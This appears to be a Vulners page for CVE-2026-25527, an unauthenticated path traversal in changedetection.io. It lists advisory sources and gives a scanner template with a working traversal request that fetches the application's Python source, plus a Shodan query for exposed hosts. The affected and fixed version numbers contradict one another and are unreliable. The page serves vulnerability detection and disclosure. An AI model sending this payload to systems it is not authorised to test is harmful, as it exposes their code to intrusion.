| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2026-25527 | 5 Jun 202601:02 | – | circl | |
| changedetection.io 路径遍历漏洞 | 19 Feb 202600:00 | – | cnnvd | |
| CVE-2026-25527 | 19 Feb 202614:18 | – | cve | |
| CVE-2026-25527 changedetection.io vulnerable to unauthenticated static path traversal | 19 Feb 202614:18 | – | cvelist | |
| CVE-2026-25527 | 19 Feb 202615:16 | – | nvd | |
| CVE-2026-25527 changedetection.io vulnerable to unauthenticated static path traversal | 19 Feb 202614:18 | – | osv | |
| PT-2026-20837 | 19 Feb 202600:00 | – | ptsecurity | |
| CVE-2026-25527 | 20 Feb 202619:40 | – | redhatcve | |
| Directory Traversal | 19 Feb 202616:23 | – | snyk | |
| CVE-2026-25527 changedetection.io vulnerable to unauthenticated static path traversal | 19 Feb 202614:18 | – | vulnrichment |
id: CVE-2026-25527
info:
name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal
author: WRG-11
severity: medium
description: |
changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static/<group>/<filename> route, letting unauthenticated attackers read local application source files.
impact: |
Unauthenticated attackers can read local application source files, potentially exposing sensitive information.
remediation: |
Upgrade to version 0.53.2 or later.
reference:
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw
- https://nvd.nist.gov/vuln/detail/CVE-2026-25527
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2026-25527
epss-score: 0.00917
epss-percentile: 0.55859
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
vendor: dgtlmoon
product: changedetection.io
shodan-query: http.html:"changedetection.io"
tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure
http:
- raw:
- |
GET /static/%2e%2e/flask_app.py HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "from changedetectionio", "def static_content(")'
- 'contains(content_type, "text/x-python")'
condition: and
# digest: 4b0a00483046022100a2a3a8fd1d0d577c1ee6de942d28ae9a84391158ecb2685e17b6679e84575d3d022100a31302d5e9d4a9b990abee830fd01388db30cf49eafa31172d49cf61d8570a9d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation